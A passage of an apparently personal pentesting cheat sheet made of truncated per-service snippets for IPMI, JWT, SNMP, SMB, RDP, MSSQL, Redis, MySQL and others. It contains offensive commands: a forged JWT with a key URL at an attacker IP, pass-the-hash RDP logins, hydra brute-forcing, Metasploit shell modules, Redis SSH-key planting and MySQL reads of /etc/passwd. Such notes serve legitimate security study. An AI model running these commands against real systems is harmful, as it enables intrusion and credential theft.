-
UDP 623 https://book.hacktricks.xyz/pentesting/623-udp-ipmi Metasploit: scanner/ipmi/ipmi_version scanner/ipmi/ipmi_dumphashes ipmitool Tool for managing IPMI. See the hacktricks article.
-
Use https://jwt.io/ to decode a JWT; it also shows the various parts. A JWT token has multiple base64 parts, separated by a dot character. Create JWT token Create PEM SSH key: openssl genrsa -out private.pem 2048 Create base64 from header and payload: $ echo -n '{"typ":"JWT","alg":"RS256","kid":"http://10.10.14.17/private.pem"}' | base64 -w0 | sed -e 's/+/-/g' -e 's#/#_#g' | sed -E 's/=+$//' =>…
-
IKE is used on VPN servers on UDP 500. Test a server with ike-scan -M $target Example output: SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration(4)=0x00007080) Ending ike-scan 1.9.4: 1 hosts scanned in 0.039 seconds (25.32 hosts/sec). 1 returned handshake; 0 returned notify PSK means that a preshared key is used. 1 returned handshake, 0, returned notify means that…
-
Example: # telnet $target 110 Trying 10.10.10.51… Connected to 10.10.10.51. Escape character is '^]'. +OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready USER mindy +OK PASS root +OK Welcome mindy LIST +OK 2 1945 1 1109 2 836 . RETR 1 +OK Message follows ...
-
See POP3.
-
Login
Before logging in, convert the username and password into base64. (!) Use telnet — nc sometimes does not work and does not return the server’s response!
HELO myname
AUTH LOGIN
cm9vdAo= // username in base64
334 Server responds with base64 string
cm9vdAo= // password in base64
235 ok // success
-
Detect SNMP devices: nmap -sU --open -p 161 10.11.1.1-254 -oG mega-snmp.txt onesixtyone Brute force of community strings against IPs. The following example tries to log in to SNMP devices via a given IP and given community names. echo public > community echo private >> community echo manager >> community for ip in $(seq 1 254);do echo 10.11.1.$ip;done…
-
Manual enumeration Subdomain enumeration Put common subdomain names (SecLists!) into a list and iterate over them with bash: $ for ip in $(cat list.txt); do host $ip.domain.com; done IP enumeration Enumerate an IP range to find domains: $ for ip in $(seq 50 100); do host 38.100.193.$ip; done | grep -v "not found" Zone transfer Perform a DNS zone…
-
Notes If the server needs old crypto, use -oKexAlgorithms=+diffie-hellman-group1-sha1 OpenSSH 7.7 allows enumerating existing users. On Windows 10 it may be possible to extract the keys from ssh-agent. Keys Get fingerprints nmap -p22 --script ssh-hostkey $target Get hostkeys nmap -p22 --script ssh-hostkey --script-args ssh_hostkey=full $target Extract fingerprints from an existing key file: ssh-keygen -E md5 -lf /tmp/found_key ssh-keygen -E sha1…
-
Check out a repo: svn checkout svn://... Show log svn log Show info svn info Show all branches svn ls svn://$victim --verbose The first number in the output of the previous command is the revision. To see the content of a repo at another revision, add the -r flag: svn ls svn://$victim --verbose -r 1 svn ls svn://$victim --verbose -r 2…
-
Use rdesktop for a normal login rdesktop $target Normal login for a local user xfreerdp /cert-ignore /u:user /p:pass /v:$target Login for a domain user xfreerdp /cert-ignore /u:user /d:dom.com /p:pass /v:$target To log in with an NTLM hash, use xfreerdp. xfreerdp /u:Peter /pth:666fb5b812a486f87062670c3baf1852 /v:$target Activate net localgroup "Remote Desktop Users" Administrator /add Create a new admin and enable…
-
Show shares with smbclient:
smbclient --no-pass -L //$target
smbclient -U guest //$target/
smbclient -U Administrator --pw-nt-hash $NTLMHASH \\\\$target\\directory
Show shares with other clients:
smbmap -R -H $target // No user
smbmap -u L4mpje -p 'bureaulampje' -d WORKGROUP -H $target -R // User
nmap -sV --script=smb-enum-shares -p445 $target
crackmapexec smb $target -u '' -p '' --shares
Vulnerability scan nmap --script=smb-vul* -p445 $target…
-
Java Remote Method Invocation is a method to execute code remotely on other systems. This Oracle document describes it. But to use it, a program has to be uploaded first, or it has to be known how to communicate with it. General A Java registry daemon has to be running. Run rmiregistry (bundled with Java) from…
-
NTLM info nmap -p 23 --script telnet-ntlm-info $target Brute-force nmap -p 23 --script telnet-brute --script-args userdb=users.txt,passdb=passwords.txt,telnet-brute.timeout=5s $target hydra -P passwords.txt -L users.txt $target telnet -V hydra -C users_and_passwords.txt $target telnet -V
-
Overview Tomcat usually listens on the following ports: 8080 — HTTP 8005 — Port for shutting down the Tomcat server; not interesting here 8009 — Same functions as the HTTP port, but via the Apache JServ protocol AJP. AJP is basically HTTP in a compressed/binary form. Checklist Check if /manager is accessible. Default credentials are tomcat / s3cret or…
-
Accessing in Linux: impacket-mssqlclient Administrator:password@$target -windows-auth Default databases are: Enumeration Determine version nmap -p 445 --script ms-sql-info $target Via metasploit auxiliary/scanner/mssql/mssql_ping Via Impacket mssqlinstance.py $target Login brute force scanner/mssql/mssql_login When an account is known, enumerate for vulnerabilities auxiliary/admin/mssql/mssql_enum Exploitation Execute commands auxiliary/admin/mssql/mssql_exec Get shell windows/mssql/mssql_payload Tools Command line sqsh -U sa -P $password -S $target:1433 From PowerShell sqlcmd -S…
-
Ports: ldap 389/tcp ldaps 636/tcp globalldap/globalcatldap 3268/tcp globalldaps/globalcatldapssl 3269/tcp Enumerate without credentials Nmap enumeration scans nmap -n -sV --script "ldap* and not brute" $target Ldapsearch scan ldapsearch -x -h $target -D '' -w '' -b "DC=BLA,DC=local" Connect to LDAPs/GlobalLDAPs: openssl s_client -connect $target:636 </dev/null openssl s_client -connect $target:3269 </dev/null Search in the directory: ldapsearch -x -b…
-
Windows Remote Management (WinRM / wsman) is a service which runs on ports 5985 and 5986. Evil Winrm Github | Opens a shell for a user root@kali:~# evil-winrm -i $victim -u melanie -p 'Welcome123!' For many users: for cred in $(cat user_pass.txt); do username=$(echo $cred | cut -d ',' -f 1) password=$(echo $cred | cut -d ',' -f…
-
Basics Authentication sequence for a user to log in on a domain (controller): Authentication sequence for an authenticated user on a local system: Terminology Kerberoasting means cracking the password offline from the NTLM hash. Useless if the service runs as a service user. Then, the password will be replaced by a 128 character long…
-
Runs on port 6379 — needs a full nmap scan! If a connection is possible via telnet, useful commands are: info CONFIG GET * all keys: keys * It is possible to determine which directories exist: config set dir /var/www/htdocs -ERR Changing directory: No such file or directory set dir /var/www +OK set dir /var/www/html +OK Upload SSH key via redis…
-
Connect from the command line mongo 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace' Show databases show dbs Switch to database use <db> Show all collections (“tables”) show collections Show all entries from a collection db.<collection>.find() Add a document db.products.insert( { item: "card", qty: 15 } ) Injections Show all records of the current table, assuming there is a WHERE clause for one field.…
-
Brute force is possible with nmap: # nmap --script vnc-brute -p 5900 localhost For TightVNC, use vncpwd to break passwords. A password can be obtained via reg query HKLM\Software\TightVNC\Server\ /v Password
-
Displays all available network shares: showmount -e $target Normal mount mount -t nfs $target:/home /mnt Mounting with nfspy — with the hide option, it mounts and unmounts for the server so the victim cannot see the new connection via showmount. nfspy -o server=192.168.1.124:/home,hide,allow_other,ro,intr /mnt Mount via SSH ssh -N -L 3049:localhost:2049 user@hostname mount -t nfs -o port=3049…
-
tcp/135 and udp/135 — and, as (Microsoft) Remote Procedure Call over a web service, tcp/593. Enumeration Obtain general information # rpcinfo -p $target # rpcinfo -s $target Connect. Hint: auto completion works; enum<tab> returns all enum commands. rpcclient -U "" $target Enumerate all API endpoints with one of the following options. python /usr/local/bin/rpcdump.py $target |…
-
Connect: mysql --host=10.10.10.13 -P4444 -u admin admin Various commands: Enumeration Nmap scripts nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $victim proxychains4 -q nmap -sV -sT -Pn -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $victim Exploitation Read and write Read with the current process id: SELECT load_file('/etc/passwd'); Write as the daemon process id: CREATE TABLE bbb(content TEXT); INSERT INTO bbb (content)…
-
Note that FTP doesn’t show hidden files! On Windows, try e.g. “cd ProgramData”. Enumeration With nmap. Scans a network for FTP servers which allow anonymous access. nmap -v -p21 --script=ftp-anon.nse 10.11.1.1-254 FTP relays The FTP specification defines FTP relays. One FTP server can tell another FTP server to send files to a third-party server.…